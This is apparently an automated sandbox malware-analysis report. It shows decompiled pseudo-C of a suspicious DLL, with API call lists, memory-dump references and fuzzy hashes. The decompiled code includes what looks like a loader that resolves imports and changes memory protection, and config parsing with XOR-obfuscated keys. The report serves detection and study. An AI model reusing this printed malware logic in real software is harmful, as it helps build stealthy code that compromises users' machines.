                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    • Opcode ID: 329072f08cae04e65fff51a5d8e0567f7ba38f6edad9e3585dc903fe34dbe43b
                    • Instruction ID: 411afce48859509ac60fb9eb7afea35fa907841bfe5222eb93a4642a42a814b1
                    • Opcode Fuzzy Hash: 329072f08cae04e65fff51a5d8e0567f7ba38f6edad9e3585dc903fe34dbe43b
                    • Instruction Fuzzy Hash: A201D23210022AEBDB229F48CC45EEE7BA9FB04B90F058029FE855A521D6329960DF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C256F Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E010C256F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E010C63FD(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E010C17AB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                    0x010c2574
                    0x010c257f
                    0x010c2581
                    0x010c2587
                    0x010c2589
                    0x010c258e
                    0x010c2597
                    0x010c259b
                    0x010c25a4
                    0x010c25a8
                    0x010c25b7
                    0x010c25aa
                    0x010c25ab
                    0x010c25b0
                    0x010c25b0
                    0x010c25a8
                    0x010c259b
                    0x010c25c0

                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,010C6999), ref: 010C2587
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,010C6999), ref: 010C25A4
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    • Opcode ID: 7380b46cff05601056021b02481c9f5e09be2f8255d29028f259389edb71bd5a
                    • Instruction ID: fe9107b37b736bff696aed159d83158ee8e457b6ced2b802f453480ad5aa6731
                    • Opcode Fuzzy Hash: 7380b46cff05601056021b02481c9f5e09be2f8255d29028f259389edb71bd5a
                    • Instruction Fuzzy Hash: B3F05436A00105BBE721D79D8C14EAF76FCDBD5A50F1100ADE945D3141EAB0DE019B71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C45D2 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C45D2(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x10ca2d8 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0x10ca1c8 = GetTickCount();
				_t5 = E010C5A5A(_a4);
				if(_t5 == 0) {
					E010C2A4C(_t10, _a4); // executed
					if(E010C4C43(_t10) != 0) {
						 *0x10ca300 = 1; // executed
					}
					_t8 = E010C6535(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                    0x010c45d2
                    0x010c45db
                    0x010c45e3
                    0x010c45e8
                    0x010c45ec
                    0x00000000
                    0x010c45ec
                    0x010c45f9
                    0x010c45fe
                    0x010c4605
                    0x010c460b
                    0x010c4617
                    0x010c4619
                    0x010c4619
                    0x010c4623
                    0x00000000
                    0x010c4623
                    0x010c4628

                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,010C108E,?), ref: 010C45DB
                    • GetTickCount.KERNEL32 ref: 010C45EF
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    • Opcode ID: 0f3581c37f3e0709c9d38d07c1e898ed6fabf04fa1ee0c3e2c98cca0afe0fc7c
                    • Instruction ID: 34ffea40aaa374c4ced042b8a3c13453239258987d2dc923f73f1c47f04959a7
                    • Opcode Fuzzy Hash: 0f3581c37f3e0709c9d38d07c1e898ed6fabf04fa1ee0c3e2c98cca0afe0fc7c
                    • Instruction Fuzzy Hash: 76E06D30740301EED7706B74AD5571D35E4BB64F46F20542CE5C4D21ADEBBA80009F22
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C3CEA Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                    Download Yara Rule
                    C-Code - Quality: 34%
                    			E010C3CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x10ca320; // 0x26dd5a8
				_t4 = _t15 + 0x10cb39c; // 0x37a8944
				_t20 = _t4;
				_t6 = _t15 + 0x10cb124; // 0x650047
				_t17 = E010C5F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E010C2E8A(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                    0x010c3cf4
                    0x010c3cf6
                    0x010c3cfd
                    0x010c3cfe
                    0x010c3cff
                    0x010c3d00
                    0x010c3d06
                    0x010c3d0b
                    0x010c3d0b
                    0x010c3d15
                    0x010c3d27
                    0x010c3d2e
                    0x010c3d5d
                    0x010c3d30
                    0x010c3d35
                    0x010c3d5a
                    0x010c3d37
                    0x010c3d3a
                    0x010c3d41
                    0x010c3d4c
                    0x010c3d43
                    0x010c3d46
                    0x010c3d46
                    0x010c3d50
                    0x010c3d50
                    0x010c3d35
                    0x010c3d64

                    APIs
                      • Part of subcall function 010C5F80: SysFreeString.OLEAUT32(?), ref: 010C605F
                      • Part of subcall function 010C2E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,010C25F5,004F0053,00000000,?), ref: 010C2E93
                      • Part of subcall function 010C2E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,010C25F5,004F0053,00000000,?), ref: 010C2EBD
                      • Part of subcall function 010C2E8A: memset.NTDLL ref: 010C2ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 010C3D50
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    • Opcode ID: 718b171d16b49f4cfa0282083a4f750882f478023d02456df87d5837ee6b4ac4
                    • Instruction ID: 4470b36f1abee88e6d00b5d70b1d3b08ec0a54e2b02fafebc69a791b98d454da
                    • Opcode Fuzzy Hash: 718b171d16b49f4cfa0282083a4f750882f478023d02456df87d5837ee6b4ac4
                    • Instruction Fuzzy Hash: 3101B17251002AFFCB11AFA8DC04DEEBBB8FB04B00F408469FA85EB061D3B199158F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001A10 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E10001A10(void* __eax, intOrPtr _a4) {

				 *0x100041c8 =  *0x100041c8 & 0x00000000;
				_push(0);
				_push(0x100041c4);
				_push(1);
				_push(_a4);
				 *0x100041c0 = 0xc; // executed
				L1000199C(); // executed
				return __eax;
			}



                    0x10001a10
                    0x10001a17
                    0x10001a19
                    0x10001a1e
                    0x10001a20
                    0x10001a24
                    0x10001a2e
                    0x10001a33

                    APIs
                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001ED5,00000001,100041C4,00000000), ref: 10001A2E
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: DescriptorSecurity$ConvertString
                    • String ID:
                    • API String ID: 3907675253-0
                    • Opcode ID: 303e5c0b8efcea9114878a4a52acd4642f3c65374f2921b9fab3e9b80a8aec8b
                    • Instruction ID: 03908131a901d61ed987414662d000861883ab9aa9f57079639177fb67c56f47
                    • Opcode Fuzzy Hash: 303e5c0b8efcea9114878a4a52acd4642f3c65374f2921b9fab3e9b80a8aec8b
                    • Instruction Fuzzy Hash: 9FC04CF8184310A6F710DB408CD5FD57651F764785F120608F200241D9CBF61094861D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100011CA Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E100011CA(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x100041cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x69b24f45 &  !( *0x100041cc - 0x69b24f45);
				_t18 = E100013D3( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x69b24f45 &  !( *0x100041cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041cc - 0x69b24f45 &  !( *0x100041cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E10001000(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E10001BE8(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E1000185B(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E1000164B(_t42);
					L8:
					return _t29;
				}
			}













                    0x100011d2
                    0x100011d4
                    0x100011f0
                    0x10001201
                    0x10001208
                    0x10001266
                    0x00000000
                    0x1000120a
                    0x1000120a
                    0x10001214
                    0x10001218
                    0x1000121d
                    0x10001225
                    0x10001229
                    0x1000122e
                    0x10001233
                    0x10001237
                    0x1000123c
                    0x1000123d
                    0x10001241
                    0x10001246
                    0x1000124e
                    0x1000124e
                    0x10001246
                    0x10001237
                    0x10001229
                    0x10001250
                    0x10001259
                    0x1000125d
                    0x10001267
                    0x1000126d
                    0x1000126d

                    APIs
                      • Part of subcall function 100013D3: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001206,?,?,?,?,?,00000002,?,?), ref: 100013F7
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 10001419
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 1000142F
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 10001445
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 1000145B
                      • Part of subcall function 100013D3: GetProcAddress.KERNEL32(00000000,?), ref: 10001471
                      • Part of subcall function 10001BE8: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 10001C20
                      • Part of subcall function 1000185B: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001894
                      • Part of subcall function 1000185B: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001909
                      • Part of subcall function 1000185B: GetLastError.KERNEL32 ref: 1000190F
                    • GetLastError.KERNEL32(?,?), ref: 10001248
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                    • String ID:
                    • API String ID: 3135819546-0
                    • Opcode ID: 012aa7560561472682e7306df76b5795729a8b3fbbe4171940503fee8637ba20
                    • Instruction ID: e451b133e2c7bff8fd842aef35b2617cafd1dcb2e1507d8e8d7c0738109fe8f5
                    • Opcode Fuzzy Hash: 012aa7560561472682e7306df76b5795729a8b3fbbe4171940503fee8637ba20
                    • Instruction Fuzzy Hash: 2A11E67A600612ABE311DB95CCC0DDB77BDEF883D47054119FA05E7509EAB1FD058790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C7885 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E010C7885(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E010C4872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E010C63FD(_a8 + _a8);
					if(_t21 != 0) {
						E010C213D(_a4, _t21, _t23);
					}
					E010C17AB(_a4);
				}
				return _t21;
			}





                    0x010c788d
                    0x010c7894
                    0x010c7896
                    0x010c78a5
                    0x010c78ac
                    0x010c78bb
                    0x010c78bf
                    0x010c78c6
                    0x010c78c6
                    0x010c78ce
                    0x010c78d3
                    0x010c78d8

                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,010C191E,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C7896
                      • Part of subcall function 010C4872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,010C3AC6), ref: 010C48AA
                      • Part of subcall function 010C4872: memcpy.NTDLL(?,010C3AC6,00000010,?,?,?,?,?,?,?,?,?,?,010C60F5,00000000,010C4DD9), ref: 010C48C3
                      • Part of subcall function 010C4872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 010C48EC
                      • Part of subcall function 010C4872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 010C4904
                      • Part of subcall function 010C4872: memcpy.NTDLL(00000000,010C4DD9,010C3AC6,0000011F), ref: 010C4956
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    • Opcode ID: a0c5dc9ef026d92495ad760142d2ae3100b38f27bfcaaf1c4d0c3c5834478f99
                    • Instruction ID: ef4b4919c3c422ec7cbb0f83580b5df2040b3f31f18ce0547ca8ff22862e5c4b
                    • Opcode Fuzzy Hash: a0c5dc9ef026d92495ad760142d2ae3100b38f27bfcaaf1c4d0c3c5834478f99
                    • Instruction Fuzzy Hash: 29F03A36100109BACB12AF59DC00CEF3FADEF94A60B00802AFE98DA110DA32D655DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C56CF Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E010C56CF(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                    0x010c56cf
                    0x010c56dc
                    0x010c56dd
                    0x010c56de
                    0x010c56e5
                    0x010c5713
                    0x010c5714
                    0x010c5717
                    0x010c571d
                    0x00000000
                    0x00000000
                    0x010c56fc
                    0x010c5706
                    0x010c570d
                    0x00000000
                    0x010c56fe
                    0x010c5701
                    0x010c5721
                    0x010c5703
                    0x010c5703
                    0x00000000
                    0x010c5703
                    0x010c5701
                    0x010c5728
                    0x010c572e
                    0x010c572e
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 9eab5c6cfdf39a5d0115c81bb30c106e9a193c59df8dad6bcb69c5f32bdb8bb0
                    • Instruction ID: 3ddf758123d8dfedfb1ad42db9e10479d57c408aaa122f62496070d1204955ed
                    • Opcode Fuzzy Hash: 9eab5c6cfdf39a5d0115c81bb30c106e9a193c59df8dad6bcb69c5f32bdb8bb0
                    • Instruction Fuzzy Hash: 79F0C979D01218EFDB10DB98E888AEDB7B8FF45645F1081AAE542A3241D3746A84CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C4DC8 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C4DC8(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E010C607D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E010C17AB(_a4);
				}
				return _t12;
			}





                    0x010c4dd4
                    0x010c4dd9
                    0x010c4ddd
                    0x010c4de4
                    0x010c4def
                    0x010c4df3
                    0x010c4df3
                    0x010c4dfc

                    APIs
                      • Part of subcall function 010C607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,010C4DD9,?,010C3AC6,010C3AC6,?), ref: 010C60B3
                      • Part of subcall function 010C607D: memset.NTDLL ref: 010C6128
                      • Part of subcall function 010C607D: memset.NTDLL ref: 010C613C
                    • memcpy.NTDLL(?,010C3AC6,00000000,?,010C3AC6,010C3AC6,?,?,010C3AC6,?), ref: 010C4DE4
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    • Opcode ID: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction ID: 9ae4912a78b9beb16a99c5fa0a55b55f6d4874f3d021223aad2f8d7b9fafc510
                    • Opcode Fuzzy Hash: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction Fuzzy Hash: 7CE0867650011AB7C7123B94DC00DEF7FBCDF61991F004018FE4996200D632D5509BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 010C4EF3 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E010C4EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x10ca31c; // 0x69b25f44
				if(E010C4451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x10ca374 = _v8;
				}
				_t33 =  *0x10ca31c; // 0x69b25f44
				if(E010C4451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x10ca31c; // 0x69b25f44
				_push(_t115);
				if(E010C4451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x10ca2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x10ca31c; // 0x69b25f44
						_t45 = E010C572F(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x10ca2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x10ca31c; // 0x69b25f44
						_t46 = E010C572F(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x10ca2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x10ca31c; // 0x69b25f44
						_t47 = E010C572F(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x10ca2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x10ca31c; // 0x69b25f44
						_t48 = E010C572F(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x10ca004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x10ca31c; // 0x69b25f44
						_t49 = E010C572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x10ca02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x10ca31c; // 0x69b25f44
						_t50 = E010C572F(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x10ca2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x10ca31c; // 0x69b25f44
								_t51 = E010C572F(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E010C1760(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E010C4DFF();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x10ca31c; // 0x69b25f44
								_t52 = E010C572F(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E010C1760(0, _t52) != 0) {
								_t121 =  *0x10ca3cc; // 0x37a95b0
								E010C1000(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x10ca31c; // 0x69b25f44
								_t53 = E010C572F(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x10ca320; // 0x26dd5a8
								_t22 = _t54 + 0x10cb252; // 0x616d692f
								 *0x10ca370 = _t22;
								goto L60;
							} else {
								_t64 = E010C1760(0, _t53);
								 *0x10ca370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x10ca31c; // 0x69b25f44
										_t56 = E010C572F(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x10ca320; // 0x26dd5a8
										_t23 = _t57 + 0x10cb791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E010C1760(0, _t56);
									}
									 *0x10ca3e0 = _t58;
									HeapFree( *0x10ca2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                    0x010c4ef3
                    0x010c4ef3
                    0x010c4ef3
                    0x010c4ef3
                    0x010c4ef6
                    0x010c4f13
                    0x010c4f21
                    0x010c4f21
                    0x010c4f26
                    0x010c4f40
                    0x010c51ae
                    0x010c51b5
                    0x010c51b9
                    0x010c51b9
                    0x010c4f46
                    0x010c4f4b
                    0x010c4f63
                    0x010c519b
                    0x010c51a5
                    0x00000000
                    0x010c4f69
                    0x010c4f69
                    0x010c4f6a
                    0x010c4f6f
                    0x010c4f85
                    0x010c4f71
                    0x010c4f71
                    0x010c4f7e
                    0x010c4f7e
                    0x010c4f89
                    0x010c4f90
                    0x010c4f92
                    0x010c4f9c
                    0x010c4fa1
                    0x010c4fa1
                    0x010c4f9c
                    0x010c4fa8
                    0x010c4fbe
                    0x010c4faa
                    0x010c4faa
                    0x010c4fb7
